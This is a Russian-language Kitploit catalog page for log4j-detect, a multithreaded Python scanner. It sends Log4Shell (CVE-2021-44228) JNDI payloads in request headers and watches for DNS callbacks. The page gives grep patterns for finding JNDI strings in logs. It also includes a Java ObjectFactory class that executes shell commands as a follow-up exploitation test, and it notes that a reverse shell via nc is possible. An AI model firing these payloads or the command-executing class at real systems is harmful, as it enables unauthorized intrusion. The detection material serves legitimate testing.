Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
log4j — Многопоточный сканер на Python, который обнаруживает Log4Shell (CVE-2021-44228) путём отправки специально сформированных HTTP-запросов с JNDI-полезными нагрузками и отслеживания DNS-обратных вызовов для выявления уязвимых хостов. | Kitploit
Инструменты/GitHubGitHub/hassaanahmad813/log4j
Сканеры уязвимостейЭксплуатацияСбор информацииВеб-безопасностьАнализ DNS
GitHubhassaanahmad813/log4j

log4j

Многопоточный сканер на Python, который обнаруживает Log4Shell (CVE-2021-44228) путём отправки специально сформированных HTTP-запросов с JNDI-полезными нагрузками и отслеживания DNS-обратных вызовов для выявления уязвимых хостов.

Репозиторий
4 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

log4j-detect

Простой скрипт на Python 3 для обнаружения уязвимости Java-библиотеки "Log4j" (CVE-2021-44228) для списка URL с многопоточностью

Этот скрипт основан на takito1812/log4j-detect

Автор: ExodataCyberdefense


Скрипт "log4j-detect.py", разработанный на Python 3, предназначен для определения того, уязвимы ли URL-адреса из списка к CVE-2021-44228.

Для этого он отправляет GET-запрос с использованием потоков (для повышения производительности) на каждый из URL-адресов в указанном списке. GET-запрос содержит полезную нагрузку, которая в случае успеха возвращает DNS-запрос на Burp Collaborator / interactsh. Эта полезная нагрузка отправляется в тестовом параметре и в заголовках "User-Agent" / "Referer" / "X-Forwarded-For" / "Authentication". Наконец, если хост уязвим, в префиксе поддомена полезной нагрузки Burp Collaborator / interactsh и в выводе скрипта появится идентификационный номер, позволяющий узнать, какой хост ответил через DNS.

Следует отметить, что этот скрипт обрабатывает только обнаружение уязвимости через DNS и не проверяет удалённое выполнение команд.

Запуск log4j-detect.py

root@kitploit:~
python3 log4j-detect.py -s <burpCollaborator/interactsh...> [-u [urls]] [-f [urlFileList]] [-t THREADS] [-p PROXY] [--urllib3-warnings|--no-urllib3-warnings]

imagen

Если у вас есть прямой доступ к серверу, вы можете выполнить:

root@kitploit:~
sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://[^\n]+' /var/log
sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[
s]?|rmi)://[^\n]+'

Чтобы проверить, пытался ли кто-то установить соединение через ldap-сервер

Если скрипт обнаруживает уязвимость

Вот пример кода, который вы можете запустить, чтобы проверить, можно ли взломать ваш сервер (если это оболочка Windows, вы можете просто использовать синтаксис PowerShell)

root@kitploit:~
public class ExportObject implements javax.naming.spi.ObjectFactory {
	public ExportObject() {
		try {
			java.lang.getRuntime().exec("touch ~/pwned");
			java.lang.getRuntime().exec("ls ~");
		} catch (Exception e) {
			e.printStackTrace();
		}
	}
}

Что-то подобное может позволить вам создать обратную оболочку с помощью команды nc

Скачать инструмент